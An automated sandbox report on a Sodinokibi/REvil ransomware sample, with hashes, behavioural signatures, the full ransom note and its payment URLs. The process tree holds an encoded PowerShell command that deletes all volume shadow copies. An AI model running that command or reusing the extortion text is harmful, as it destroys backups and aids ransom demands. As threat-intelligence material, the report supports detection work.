Analysis

  • max time kernel
    153s
  • max time network
    173s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:57

General

  • Target

    d69b8666af8ca8dff2770402dbff9110e2b9533901771442b079955e055ecc3b.exe

  • Size

    114KB

  • MD5

    a74b5a306c88a8eac8f5ba0bb502fae0

  • SHA1

    609f85fb3400e7ba88df11df2a9b965680a500fe

  • SHA256

    d69b8666af8ca8dff2770402dbff9110e2b9533901771442b079955e055ecc3b

  • SHA512

    be4ad74324e807fa51e6bae936f0a19abf44b4a68fb6a47032a84748e7a3d9abcfa6b20f41a808019a7fa40d5ea8c7cb6a8221eb625241ce7a0bbb314c8f8cc2

Malware Config

Extracted

Path

C:\x8y4648-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension x8y4648. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/081C43FD3A3B5CD0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/081C43FD3A3B5CD0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: BKrGlxDeQsctLhRwGPtZx4/gJNRIqQer/8z8xpslmHClN3cY9WXN80U0Qycv4UmA OEvXw/uIhrx1tEj/3/UYQ+WIjSnlaZbKRLLI03k6il8WFnWl6/2JjXoGu2FRj8Ni zx+cdCAuMAXp9DQRccmhkEB+MnbKOVQ37o3/VwaVhnLaMM6fPMZT/nWURVFeQRwJ RGm8+e7DcywS8twtRmniTyHHNz4Vvzw1BRl8Xpr/3X9xtxYFUZZ9ge8g1zZqWlBU Q2eaJ302ASvbpN3HNwesaKfoCxoGy2vAg90Zz9+Ur8gjoYmy0GrVM4wTVH/BrEBA c6K+vEuDB2v9HdsibU2BgApyGWr/IAOqIpFRouR6DlQv2+XQ1Hm8U1Z90ato3Xbb iZz79gL8/e6+wkDtW0wlB0EjM43iIsXyP0e3h+FOXZuqV3EKntnK2QbmzPKd9B5k ldYTD5PUA0R7b3Nj+Cij11lbuCpNJiQNHun7KShER7BQ8uZo6822Hg4O3HW6SyXT sLcAcOk2Hp7kHk9rQoYDjj8qCxT2vcVhZr2xCBYCiZ5c+IurW/zzK3ZxyFFUDOY5 L5dKutUgaatYLlMqBM5J9JXPlMI1QyFVFaUnJo3Zlvv4/MAP9TNKDi7DpRPu4YUh qMWAQ3/H6mW3T0SGmyIwd3mSpDzzT3c1jNXqpyIlt1BFbYSkQVhJsQuXEu1c4ZMC +/+3QGxYpu6ndurmp2bmRZ9NijNlC/V6OufAm590G9+Xe3P7TvchJ6pimcctLkXx /BvIe7aGw5Bta8pOc69aITCPOpqic8168MYMv52dxg/Y2oDDadAWAFR99AzhgJUa JoU4RvmZ9x0M1G4zH9wNy01djDds7qrMkNIahIO9Dbaxg/Z1bjW1eydZC8NN0nCi TOHEdriGt9VWgleFFpBCvS9zP/bxJ9vS2qXiJkQ1p7pvI43C4VpLlYikLp+Nenq0 iUL/Ky9MxjGHB+8dQ7S1yAfIH+uQDX5ayQH/9ZNa4oV77FP7B7GQrGCSUuoYo5Hf hiSVICyd3IMd3bWS/1nRPsOeGzdDISkreTdth62CkKFl1PkMXSnhUzHWwAwrrbSC twUtvCzSNlMoQ0rt+ss5XJ5aydWfhAhQD/m4R1IHM2H2Z3WEDA+/n9VbO54Xm1Zx xzMdflMcccRolEBgpwrV1HGiXf1vdX5MRdGa4BQZ4V38nTUnFh6/NgsrBs4jgusl W9IYpixlQ8zGvNqtTZdIe8xbhUVEowXiv1z/EsZjQcozb4d3NiacR7TlyNrGCi6g T6ia+uZXJK89b5QvsgOO6AExlagYEsD0LrA= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/081C43FD3A3B5CD0

http://decryptor.cc/081C43FD3A3B5CD0

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d69b8666af8ca8dff2770402dbff9110e2b9533901771442b079955e055ecc3b.exe
    "C:\Users\Admin\AppData\Local\Temp\d69b8666af8ca8dff2770402dbff9110e2b9533901771442b079955e055ecc3b.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1668
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1032
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1300

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1668-56-0x000007FEFB631000-0x000007FEFB633000-memory.dmp
      Filesize

      8KB

    • memory/1668-58-0x00000000022E0000-0x0000000002302000-memory.dmp
      Filesize

      136KB

    • memory/1668-59-0x0000000002302000-0x0000000002304000-memory.dmp
      Filesize

      8KB

    • memory/1668-60-0x0000000002304000-0x0000000002307000-memory.dmp
      Filesize

      12KB

    • memory/1668-57-0x000007FEF2820000-0x000007FEF337D000-memory.dmp
      Filesize

      11.4MB

    • memory/1668-61-0x000000000230B000-0x000000000232A000-memory.dmp
      Filesize

      124KB

    • memory/1964-55-0x0000000074B21000-0x0000000074B23000-memory.dmp
      Filesize

      8KB